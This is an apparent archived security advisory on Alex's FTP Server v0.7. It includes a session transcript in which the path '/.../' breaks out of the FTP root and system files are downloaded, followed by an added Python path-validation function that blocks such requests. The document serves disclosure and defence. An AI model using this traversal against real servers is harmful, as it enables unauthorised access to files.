COMMAND

    Alex's FTP Server

SYSTEMS AFFECTED

    Alex's FTP Server

PROBLEM

    Joe Testa found the following.  Alex's FTP Server v0.7 is an FTP
    server.  Vulnerabilities exist which allow a user to break out of
    the FTP root.

    The following is an illustration of the problem.  An FTP root of
    'c:\directory\directory' was used:

        Connected to xxxxxxxxxx.rh.rit.edu.
        220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Enter PASS command
        Password:
        230 Logged in
        ftp> get /.../autoexec.bat
        200 Port command okay
        150 Opening data connection for retr "/.../autoexec.bat"
        226 Transfer complete
        ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
        ftp> cd ...
        257 "/.../" is current directory
        ftp> get command.com
        200 Port command okay
        150 Opening data connection for retr "/.../command.com"
        226 Transfer complete
        ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
        ftp>
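
    The check that would refuse the requests shown above, as an added
    example that is not part of the original advisory or of the
    server's code.  It resolves a client path component by component
    against the FTP root and rejects components made only of dots,
    such as the '...' in the transcript.  The function names are
    hypothetical, and it assumes, as the transcript suggests, that the
    host resolves '...' to a directory above the parent.

```python
import ntpath

FTP_ROOT = r"c:\directory\directory"  # FTP root from the advisory's illustration


def is_dot_run(component):
    """True for components made only of dots/spaces: '...', '....', '.. '."""
    return component.strip(". ") == ""


def resolve_ftp_path(cwd, requested, root=FTP_ROOT):
    """Map a client path to a local path under root, or raise PermissionError.

    cwd is the session's virtual directory ('/' is the FTP root).
    """
    # Absolute FTP paths start at the virtual root, relative ones at cwd.
    if requested.startswith(("/", "\\")):
        virtual = requested
    else:
        virtual = cwd + "/" + requested
    parts = []
    for comp in virtual.replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PermissionError("path escapes FTP root")
            parts.pop()
        elif is_dot_run(comp) or ":" in comp:
            # '...' is not caught by ordinary '..' handling; ':' would allow
            # a drive letter or stream name to be smuggled in.
            raise PermissionError("illegal path component: %r" % comp)
        else:
            parts.append(comp)
    local = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the normalized result must still sit under root.
    root_cmp = ntpath.normcase(ntpath.normpath(root))
    local_cmp = ntpath.normcase(local)
    if local_cmp != root_cmp and not local_cmp.startswith(root_cmp + "\\"):
        raise PermissionError("path escapes FTP root")
    return local
```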

SOLUTION

    No quick fix is possible.